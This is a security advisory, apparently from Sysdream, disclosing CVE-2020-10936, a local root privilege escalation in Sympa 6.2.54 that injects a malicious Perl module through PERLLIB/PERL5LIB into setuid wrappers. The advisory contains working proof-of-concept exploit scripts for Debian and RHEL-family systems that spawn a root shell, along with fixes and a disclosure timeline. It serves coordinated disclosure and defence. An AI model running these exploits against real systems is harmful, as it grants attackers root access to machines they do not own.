[CVE-2020-10936] SYMPA Privileges escalation to root

mai 13, 2020

We found a way to escalate our privileges to root, exploiting a vulnerability in the way that a setsuid binary can be abused to load malicious Perl libraries.

Description

Sympa is an electronic mailing list manager.

It is used to automate list management functions such as subscription, moderation and management of archives. Sympa also manages sending of messages to the lists, and makes it possible to reduce the load on the system. Provided that you have enough memory on your system, Sympa is especially well adapted for big lists.

Threat

Privilege escalation to root

Vulnerability records

CVE ID: CVE-2020-10936

Access Vector: local

Security Risk: high

Vulnerability: CWE-269

CVSS Base Score: 8.8

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Details

When installing sympa on CentOS/Fedora/RHEL, several binaries are set with the suid/sgid bit:

[sysdream@localhost ~]$ ls -lah /usr/libexec/sympa/
[...]
-rwsr-xr-x.  1 sympa sympa  16K 23 janv. 09:46 bouncequeue
-rwsr-xr-x.  1 sympa sympa  16K 23 janv. 09:46 familyqueue
-rwsr-xr-x.  1 sympa sympa  16K 23 janv. 09:46 queue
-rwsr-x---.  1 root  sympa  16K 23 janv. 09:46 sympa_newaliases-wrapper
-rwsr-sr-x.  1 sympa sympa  16K 23 janv. 09:46 sympa_soap_server-wrapper.fcgi
-rwsr-sr-x.  1 sympa sympa  16K 23 janv. 09:46 wwsympa-wrapper.fcgi

As you can see, only the sympa_newaliases-wrapper binary is suid root.

However, this binary is not world-executable. Only users from the sympa group are allowed to execute this program, and this is not our case.

So, in order to be able to execute this program, we need to perform a privileges escalation to the sympa user.

If we look at the wwsympa-wrapper.fcgi setuid/setgid sympa source code, we can see that the main function execute the WWSYMPA binary (wwsympa.fcgi) as the sympa user and group.

#include <unistd.h>

int main(int argn, char **argv, char **envp) {
    setreuid(geteuid(),geteuid()); // Added to fix the segfault
    setregid(getegid(),getegid()); // Added to fix the segfault
    argv[0] = WWSYMPA;
    return execve(WWSYMPA,argv,envp);
}

The vulnerability is caused by the envp variable that is passed to the WWSYMPA binary.

It means that every environment variable defined when running the wwsympa-wrapper.fcgi is passed to wwsympa.fcgi.

As wwsympa.fcgi is interpreted as a PERL script, the interpreter will look at the PERLLIB and PERL5LIB environment variable to look for Perl modules.

So, if we can create a malicious Perl module, the PERL interpreter will look in the PERLLIB and PERL5LIB path, and if a module name matches, it will load it.

We came up with the following POC that allows us to escalate our privileges as sympa, by creating a malicious Config perl module:

$ id
uid=1000(sysdream) gid=1000(sysdream) groupes=1000(sysdream),10(wheel) contexte=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
$ mkdir /tmp/poc
$ echo 'exec("/bin/bash");' > /tmp/poc/Config.pm
$ PERL5LIB=/tmp/poc PERLLIB=/tmp/poc /usr/libexec/sympa/wwsympa-wrapper.fcgi
bash-5.0$ id
uid=977(sympa) gid=975(sympa) groupes=975(sympa),10(wheel),1000(sysdream) contexte=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

As we are now the sympa user, we are allowed to execute the sympa_newaliases-wrapper suid-root binary. Let’s take a look at the source code:

#include <unistd.h>

int main(int argn, char **argv, char **envp) {
    setreuid(geteuid(),geteuid());
    setregid(getegid(),getegid());
    argv[0] = SYMPA_NEWALIASES;
    return execve(SYMPA_NEWALIASES, argv, envp);
}

SYMPA_NEWALIASES point to sympa_newaliases.pl, which is also a Perl script!

If we use the same POC as before, we could gain root privilege escalation as root.

bash-5.0$ id
uid=977(sympa) gid=975(sympa) groupes=975(sympa),10(wheel),1000(sysdream) contexte=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
bash-5.0$ echo $PERLLIB
/tmp/poc
bash-5.0$ echo $PERL5LIB
/tmp/poc
bash-5.0$ /usr/libexec/sympa/sympa_newaliases-wrapper
[root@localhost poc]# id
uid=0(root) gid=975(sympa) groupes=975(sympa),10(wheel),1000(sysdream) contexte=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@localhost poc]# whoami
root

On Debian/Ubuntu systems, /usr/lib/sympa/bin/sympa_newaliases-wrapper is already suid root and world-executable, which means that we don’t have to escalate to sympa in order to gain root privileges:

user@debian:~$ ls -lah /usr/lib/sympa/bin/sympa_newaliases-wrapper
-rwsr-xr-x 1 root root 14K janv. 20  2019 /usr/lib/sympa/bin/sympa_newaliases-wrapper
user@debian:~$ mkdir /tmp/poc && echo 'exec("/bin/sh")' >> /tmp/poc/Config.pm
user@debian:~$ PERL5LIB=/tmp/poc PERLLIB=/tmp/poc /usr/lib/sympa/bin/sympa_newaliases-wrapper 
# whoami
root
#

Proof of Concept : Root privilege escalation – Debian / Ubuntu

Standard user to root privileges:

#!/bin/sh
echo "[+] SYMPA on Debian/Ubuntu root privilege escalation exploit - n.chatelain -at- sysdream.com"
echo "[~] Exploit setup."
EXPLOITDIR=$(mktemp -d)
EXPLOITFILE="$EXPLOITDIR/Config.pm"
chmod 777 $EXPLOITDIR
echo 'exec("/bin/sh");' > $EXPLOITFILE
export PERLLIB=$EXPLOITDIR
export PERL5LIB=$EXPLOITDIR
echo "[+] Triggering exploit."
/usr/lib/sympa/bin/sympa_newaliases-wrapper

Output:

user@debian:~$ bash poc.sh 
[+] SYMPA on Debian/Ubuntu root privilege escalation exploit - n.chatelain -at- sysdream.com
[~] Exploit setup.
[+] Triggering exploit.
# whoami
root

Proof of Concept : Root privilege escalation – Fedora / CentOS / RedHat

Standard user, to sympa, to root privilege escalation:

#!/bin/sh
echo "[+] SYMPA on Fedora/CentOS/RHEL root privilege escalation exploit - n.chatelain -at- sysdream.com"
echo "[~] Exploit setup."
EXPLOITDIR=$(mktemp -d)
EXPLOITFILE="$EXPLOITDIR/Config.pm"
chmod 777 $EXPLOITDIR
cat > $EXPLOITFILE <<"EOL"
my $sympauser = "sympa";
my $pwuid = getpwuid( $< );
$elevate = $pwuid eq $sympauser;
$root = $pwuid eq "root";
if ($elevate == 1)
{
    print "[+] Running as service user, elevating privileges as root...\n";
    exec("/usr/libexec/sympa/sympa_newaliases-wrapper");
}
else {
    if ($root == 1)
    {
        print "[+] Running as root, popping shell.\n";
        exec("/bin/sh");
    }
    else
    {
        print "[!] Not running as root/sympa, exploit failed.\n";
    }
}
EOL
export PERLLIB=$EXPLOITDIR
export PERL5LIB=$EXPLOITDIR
echo "[+] Triggering exploit."
/usr/libexec/sympa/wwsympa-wrapper.fcgi

Output:

[user@localhost exploit]$ bash poc.sh 
[+] SYMPA on Fedora/CentOS/RHEL root privilege escalation exploit - n.chatelain -at- sysdream.com
[~] Exploit setup.
[+] Triggering exploit.
[+] Running as service user, elevating privileges as root...
[+] Running as root, popping shell.
sh-5.0# whoami
root

Affected versions

Sympa 6.2.54

Workarounds

Sympa suggests the following workarounds:

Stop using FastCGI wrappers and remove them
1. Modify configuration for HTTP server so that it will not use the
  wrapper. For detailed instructions see:
  - Configure HTTP server: Instruction by HTTP servers
    https://sympa-community.github.io/manual/install/configure-http-server.html#instruction-by-http-servers
2. Remove executable files of FastCGI wrappers:
  - $EXECCGIDIR/wwsympa-wrapper.fcgi
  - $EXECCGIDIR/sympa_soap_server-wrapper.fcgi
No workaround has been known about some obsoleted systems requiring
FastCGI wrapper, in particular Apache HTTP Server 2.2.x and earlier.

Solution

Sympa suggests to:

Upgrade to version 6.2.56
- Source distribution: sympa-6.2.56.tar.gz
- Binary distributions: Check release information by
  distributors.

or, if you have installed Sympa using earlier version of source distribution,

Apply a patch to the source, recompile wrappers and renistall them:
- Patch for sympa-6.2 or later: sympa-6.2.54-sa-2020-002.patch

Timeline

2020-03-12 Initial discovery
2020-03-24 Contacting the developpers
2020-03-24 Aknownledgment from the Sympa security team
2020-04-03 Feedback with a proposed patch, but not to be applied to all SUID binaries.
2020-04-16 We confirm that the patch seems efficient, but it would be better to apply it on all binaries.
2020-04-24 Response: setuid-sympa wrappers are deprecated, so they should not be used in the first place.
2020-05-04 Follow-up e-mail about a release date for the patch and that our disclosure target is on 2020-05-13.
2020-05-18 No reply, last follow-up.
2020-05-21 Reply with draft advisory.
2020-05-25 Disclosure with provided solutions and workarounds.

Credits to the Sympa team for the quick and efficient handling of our report.

In particular, thanks to Soji Ikeda for his work and patch development.

Credits

Nicolas Chatelain, Sysdream (n.chatelain -at- sysdream -dot- com)

Recevez toute l'actualité en avant-première

Prénom *

Nom *

Email *

Je consens au traitement des données personnelles que j’ai renseignées pour les finalités décrites ci-après.

Je reconnais avoir pris connaissance des Conditions générales d'utilisation et de la Politique de confidentialité de SysDream, et je les accepte.

Le captcha n'est pas correct

Merci, nous avons pris votre demande.

Les données collectées via ce formulaire sont traitées par Hub One afin de procéder à votre demande d’inscription à l’onglet « Recevez nos actualités » et ainsi pouvoir être informé périodiquement par email. Vous disposez de droits (accès, rectification, effacement de vos données ainsi que limitation et opposition au traitement) et de la possibilité de retirer votre consentement à tout moment en vous adressant au Délégué à la protection des données de Hub One à l’adresse suivante : dpd@hubone.fr. En cas d’échec, vous disposez également d’un droit de réclamation auprès de la CNIL. Pour plus d’informations, veuillez prendre connaissance de notre politique de confidentialité